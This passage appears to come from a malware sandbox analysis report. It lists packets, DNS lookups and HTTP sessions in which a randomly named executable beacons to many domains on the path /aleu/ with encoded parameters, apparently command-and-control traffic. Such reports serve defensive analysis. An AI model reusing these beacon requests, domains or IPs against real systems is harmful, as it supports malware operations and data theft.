                                                                                                                                                                          Apr 26, 2024 07:44:32.478503942 CEST80497663.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:32.478521109 CEST4976680192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:32.478521109 CEST4976680192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:32.478590012 CEST4976680192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:32.718971968 CEST80497663.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:32.719002008 CEST80497663.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:32.719023943 CEST80497663.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:32.719221115 CEST4976680192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:32.724392891 CEST4976680192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:32.964617968 CEST80497663.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:47.227720022 CEST4976780192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:47.470576048 CEST804976791.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:47.470675945 CEST4976780192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:47.472965002 CEST4976780192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:47.716365099 CEST804976791.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:47.716449976 CEST804976791.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:47.716532946 CEST4976780192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:48.987711906 CEST4976780192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:50.006006956 CEST4976880192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:50.267945051 CEST804976891.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:50.268115044 CEST4976880192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:50.273463964 CEST4976880192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:50.515738964 CEST804976891.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:50.515758991 CEST804976891.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:50.515928030 CEST4976880192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:51.788678885 CEST4976880192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:52.803031921 CEST4976980192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:53.045059919 CEST804976991.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:53.045164108 CEST4976980192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:53.047148943 CEST4976980192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:53.289172888 CEST804976991.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:53.289206028 CEST804976991.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:53.289226055 CEST804976991.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:53.289242983 CEST804976991.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:53.289294958 CEST4976980192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:53.531481028 CEST804976991.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:56.746758938 CEST4977080192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:57.002630949 CEST804977091.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:57.003145933 CEST4977080192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:57.056116104 CEST4977080192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:57.300765038 CEST804977091.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:57.300817013 CEST804977091.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:57.300939083 CEST4977080192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:57.303987980 CEST4977080192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:57.546478033 CEST804977091.195.240.19192.168.2.7

                                                                                                                                                                          UDP Packets

                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Apr 26, 2024 07:41:36.969655991 CEST5540253192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:41:37.420319080 CEST53554021.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:41:53.521192074 CEST6494353192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:41:53.647996902 CEST53649431.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:42:01.708585978 CEST5962953192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:42:01.956788063 CEST53596291.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:42:15.990933895 CEST5058753192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:42:16.655599117 CEST53505871.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:42:30.980360985 CEST6212053192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:42:31.687937975 CEST53621201.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:42:46.038351059 CEST5813353192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:42:46.435086966 CEST53581331.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:43:00.334433079 CEST4928753192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:43:00.489115953 CEST53492871.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:43:08.555289030 CEST5566753192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:43:09.042881966 CEST53556671.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:43:23.740672112 CEST6345153192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:43:23.948503971 CEST53634511.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:43:38.693550110 CEST6155553192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:43:39.205239058 CEST53615551.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:43:52.793358088 CEST5871353192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:43:53.799794912 CEST5871353192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:43:54.100650072 CEST53587131.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:43:54.100673914 CEST53587131.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:08.444859028 CEST5258253192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:44:08.616632938 CEST53525821.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:22.476324081 CEST5992453192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:44:23.359947920 CEST53599241.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:38.540174007 CEST5794553192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:44:38.694013119 CEST53579451.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:46.756547928 CEST5133653192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:44:47.225053072 CEST53513361.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:45:02.318707943 CEST5707653192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:45:02.445117950 CEST53570761.1.1.1192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:45:06.926474094 CEST4993953192.168.2.71.1.1.1
                                                                                                                                                                          Apr 26, 2024 07:45:07.054883957 CEST53499391.1.1.1192.168.2.7

                                                                                                                                                                          DNS Queries

                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                          Apr 26, 2024 07:41:36.969655991 CEST192.168.2.71.1.1.10xb98Standard query (0)www.maxiwalls.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:41:53.521192074 CEST192.168.2.71.1.1.10xa38eStandard query (0)www.choosejungmann.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:42:01.708585978 CEST192.168.2.71.1.1.10xe32aStandard query (0)www.paydayloans3.shopA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:42:15.990933895 CEST192.168.2.71.1.1.10x5be3Standard query (0)www.colchondealquiler.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:42:30.980360985 CEST192.168.2.71.1.1.10x2b06Standard query (0)www.www60270.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:42:46.038351059 CEST192.168.2.71.1.1.10xf126Standard query (0)www.skibinscy-finanse.plA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:00.334433079 CEST192.168.2.71.1.1.10xab64Standard query (0)www.avoshield.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:08.555289030 CEST192.168.2.71.1.1.10x9d14Standard query (0)www.fairmarty.topA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:23.740672112 CEST192.168.2.71.1.1.10xa8c1Standard query (0)www.theertyuiergthjk.homesA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:38.693550110 CEST192.168.2.71.1.1.10x6ff9Standard query (0)www.aprovapapafox.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:52.793358088 CEST192.168.2.71.1.1.10x712eStandard query (0)www.83634.cnA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:53.799794912 CEST192.168.2.71.1.1.10x712eStandard query (0)www.83634.cnA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:44:08.444859028 CEST192.168.2.71.1.1.10x1709Standard query (0)www.polhi.lolA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:44:22.476324081 CEST192.168.2.71.1.1.10xe1c1Standard query (0)www.valentinaetommaso.itA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:44:38.540174007 CEST192.168.2.71.1.1.10xa259Standard query (0)www.toyzonetshirts.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:44:46.756547928 CEST192.168.2.71.1.1.10xa54cStandard query (0)www.solesense.proA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:45:02.318707943 CEST192.168.2.71.1.1.10x2dfbStandard query (0)www.onitsuka-ksa.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:45:06.926474094 CEST192.168.2.71.1.1.10x7acdStandard query (0)www.onitsuka-ksa.comA (IP address)IN (0x0001)false

                                                                                                                                                                          DNS Answers

                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                          Apr 26, 2024 07:41:37.420319080 CEST1.1.1.1192.168.2.70xb98No error (0)www.maxiwalls.com79.98.25.1A (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:41:53.647996902 CEST1.1.1.1192.168.2.70xa38eName error (3)www.choosejungmann.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:42:01.956788063 CEST1.1.1.1192.168.2.70xe32aNo error (0)www.paydayloans3.shop64.190.62.22A (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:42:16.655599117 CEST1.1.1.1192.168.2.70x5be3No error (0)www.colchondealquiler.com217.76.128.34A (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:42:31.687937975 CEST1.1.1.1192.168.2.70x2b06No error (0)www.www60270.xyzfix01.pfw.djamxtvyk.cloudland3.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:42:31.687937975 CEST1.1.1.1192.168.2.70x2b06No error (0)fix01.pfw.djamxtvyk.cloudland3.com52.175.38.24A (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:42:46.435086966 CEST1.1.1.1192.168.2.70xf126No error (0)www.skibinscy-finanse.pl178.211.137.59A (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:00.489115953 CEST1.1.1.1192.168.2.70xab64Name error (3)www.avoshield.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:09.042881966 CEST1.1.1.1192.168.2.70x9d14No error (0)www.fairmarty.top203.161.46.103A (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:23.948503971 CEST1.1.1.1192.168.2.70xa8c1No error (0)www.theertyuiergthjk.homes205.234.233.38A (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:39.205239058 CEST1.1.1.1192.168.2.70x6ff9No error (0)www.aprovapapafox.comaprovapapafox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:39.205239058 CEST1.1.1.1192.168.2.70x6ff9No error (0)aprovapapafox.com162.240.81.18A (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:54.100650072 CEST1.1.1.1192.168.2.70x712eNo error (0)www.83634.cnsxp92m4v.as22566.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:54.100650072 CEST1.1.1.1192.168.2.70x712eNo error (0)sxp92m4v.as22566.comvf3ba6qx.as22566.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:54.100650072 CEST1.1.1.1192.168.2.70x712eNo error (0)vf3ba6qx.as22566.com103.93.124.160A (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:54.100673914 CEST1.1.1.1192.168.2.70x712eNo error (0)www.83634.cnsxp92m4v.as22566.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:54.100673914 CEST1.1.1.1192.168.2.70x712eNo error (0)sxp92m4v.as22566.comvf3ba6qx.as22566.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:43:54.100673914 CEST1.1.1.1192.168.2.70x712eNo error (0)vf3ba6qx.as22566.com103.93.124.160A (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:44:08.616632938 CEST1.1.1.1192.168.2.70x1709No error (0)www.polhi.lolparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:44:08.616632938 CEST1.1.1.1192.168.2.70x1709No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:44:23.359947920 CEST1.1.1.1192.168.2.70xe1c1No error (0)www.valentinaetommaso.itmatrimoniovalentinaetommaso.webnode.itCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:44:23.359947920 CEST1.1.1.1192.168.2.70xe1c1No error (0)matrimoniovalentinaetommaso.webnode.itlb.webnode.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:44:23.359947920 CEST1.1.1.1192.168.2.70xe1c1No error (0)lb.webnode.io3.125.172.46A (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:44:23.359947920 CEST1.1.1.1192.168.2.70xe1c1No error (0)lb.webnode.io3.73.27.108A (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:44:38.694013119 CEST1.1.1.1192.168.2.70xa259Name error (3)www.toyzonetshirts.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:44:47.225053072 CEST1.1.1.1192.168.2.70xa54cNo error (0)www.solesense.proparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:44:47.225053072 CEST1.1.1.1192.168.2.70xa54cNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:45:02.445117950 CEST1.1.1.1192.168.2.70x2dfbName error (3)www.onitsuka-ksa.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Apr 26, 2024 07:45:07.054883957 CEST1.1.1.1192.168.2.70x7acdName error (3)www.onitsuka-ksa.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                          • www.maxiwalls.com
                                                                                                                                                                          • www.paydayloans3.shop
                                                                                                                                                                          • www.colchondealquiler.com
                                                                                                                                                                          • www.skibinscy-finanse.pl
                                                                                                                                                                          • www.fairmarty.top
                                                                                                                                                                          • www.theertyuiergthjk.homes
                                                                                                                                                                          • www.aprovapapafox.com
                                                                                                                                                                          • www.83634.cn
                                                                                                                                                                          • www.polhi.lol
                                                                                                                                                                          • www.valentinaetommaso.it
                                                                                                                                                                          • www.solesense.pro

                                                                                                                                                                          HTTP Packets

                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          0192.168.2.74972279.98.25.1802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:41:37.699114084 CEST500OUTGET /aleu/?MzYDklf=ok/gmcxpcerYYESWh7Vklw9Bm7swo7gbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBY6tcFTr5ihP/i1r4jMGBPezmBbp/yafvkg2ntS8iiyqpI2uarI9tc8j7&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.maxiwalls.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Apr 26, 2024 07:41:37.967592955 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:41:37 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Cache-control: max-age=300
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Length: 5662
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 38 30 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 35 63 61 33 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 74 68 75 6d 62 6e 61 69 6c 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 74 68 75 6d 62 6e 61 69 6c 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 64 65 66 61 75 6c 74 2e 63 73 73 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 6d 61 78 69 77 61 6c 6c 73 2e 63 6f 6d 20 2d 20 55 c5 be 72 65 67 69 73 74 72 75 6f 74 61 73 20 64 6f 6d 65 6e 61 73 20 2d 20 49 6e 74 65 72 6e 65 74 6f 20 76 69 7a 69 6a 61 3c 2f 74 69 74 6c 65 3e 0d 0a 20 3c 2f 68 65 61 64 3e 0d 0a 20 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 21 2d 2d 20 62 65 67 69 6e 20 68 65 61 64 65 72 20 2d 2d 3e 0d 0a 0d 0a 20 20 3c 74 61 62 6c 65 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 30 3e 0d 0a 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 3c 74 64 3e 0d 0a 20 20 20 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 68 65 61 64 65 72 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 37 36 38 20 68 65 69 67 68 74 3d 31 30 30 20 73 63 72 6f 6c 6c 69 6e 67 3d 6e 6f 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 3e 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 3c 74 72 3e 3c 74 64 20 68 65 69 67 68 74 3d 32 34 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 0d 0a 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 0d 0a 3c 21 2d 2d 20 65 6e 64 20 68 65 61 64 65 72 20 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 62 65 67 69 6e 20 62 6f 64 79 20 2d 2d 3e 0d 0a 0d
                                                                                                                                                                          Data Ascii: <!doctype html><html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow"> <meta name="viewport" content="width=800, maximum-scale=1"> <meta name="theme-color" content="#005ca3"> <meta itemprop="image" content="https://assets.iv.lt/images/thumbnail.png"> <meta property="og:image" content="https://assets.iv.lt/images/thumbnail.png"> <link rel="icon" sizes="96x96" href="https://assets.iv.lt/images/icon.png"> <link rel="apple-touch-icon" href="https://assets.iv.lt/images/icon.png"> <link rel="stylesheet" type="text/css" href="https://assets.iv.lt/default.css"> <title>maxiwalls.com - Uregistruotas domenas - Interneto vizija</title> </head> <body>... begin header --> <table align=center cellpadding=0 cellspacing=0> <tr> <td> <iframe src="https://assets.iv.lt/header.html" width=768 height=100 scrolling=no frameborder=0></iframe> </td> </tr> <tr><td height=24></td></tr> </table>... end header -->... begin body -->
                                                                                                                                                                          Apr 26, 2024 07:41:37.967613935 CEST1289INData Raw: 0a 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 37 36 38 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 30 3e 0d 0a 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 3c 74 64 3e 0d 0a
                                                                                                                                                                          Data Ascii: <table width=768 align=center cellpadding=0 cellspacing=0> <tr> <td> <h1>maxiwalls.com</h1> <p> </td> </tr> <tr valign=top> <td width=508> Domenas <b>maxiwalls.com</b> skmingai uregistruotas
                                                                                                                                                                          Apr 26, 2024 07:41:37.967633009 CEST1289INData Raw: c4 97 6d c4 97 2c 20 6b 61 64 20 c5 a1 69 61 6e 64 69 65 6e 20 70 61 73 20 6d 75 73 20 73 61 76 6f 20 69 6e 74 65 72 6e 65 74 6f 20 73 76 65 74 61 69 6e 65 73 20 74 61 6c 70 69 6e 61 20 69 72 20 6d 75 6d 69 73 20 70 61 73 69 74 69 6b 69 20 64 61
                                                                                                                                                                          Data Ascii: m, kad iandien pas mus savo interneto svetaines talpina ir mumis pasitiki daugiausiai alies gyventoj. <p> <table class=table> <tr> <th></th> <th>Patui</th> <th>Svetainei</th> <th>U
                                                                                                                                                                          Apr 26, 2024 07:41:37.967653990 CEST1289INData Raw: 20 20 3c 74 64 3e 2b 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 3c 74 64 3e 2b 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 3c 74 72 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 20 20 20 20 20 20 20 3c 74 64 20
                                                                                                                                                                          Data Ascii: <td>+</td> <td>+</td> </tr> <tr align=center> <td align=left>Reseller</td> <td>-</td> <td>-</td> <td>-</td> <td>+</td> </tr> <tr align=center> <td align=left
                                                                                                                                                                          Apr 26, 2024 07:41:37.967753887 CEST710INData Raw: 6c 69 3e 3c 61 20 74 61 72 67 65 74 3d 5f 74 6f 70 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 76 2e 6c 74 2f 70 72 6f 66 65 73 69 6f 6e 61 6c 75 73 2d 68 6f 73 74 69 6e 67 61 73 2f 22 3e 50 72 6f 66 65 73 69 6f 6e 61 6c 75 73 20
                                                                                                                                                                          Data Ascii: li><a target=_top href="https://www.iv.lt/profesionalus-hostingas/">Profesionalus hostingas</a> <li><a target=_top href="https://www.iv.lt/vps-serveriai/">Serveri nuoma</a> <li><a target=_top href="https://www.iv.lt/sertifikata


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          1192.168.2.74972764.190.62.22802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:42:02.204075098 CEST765OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.paydayloans3.shop
                                                                                                                                                                          Origin: http://www.paydayloans3.shop
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.paydayloans3.shop/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
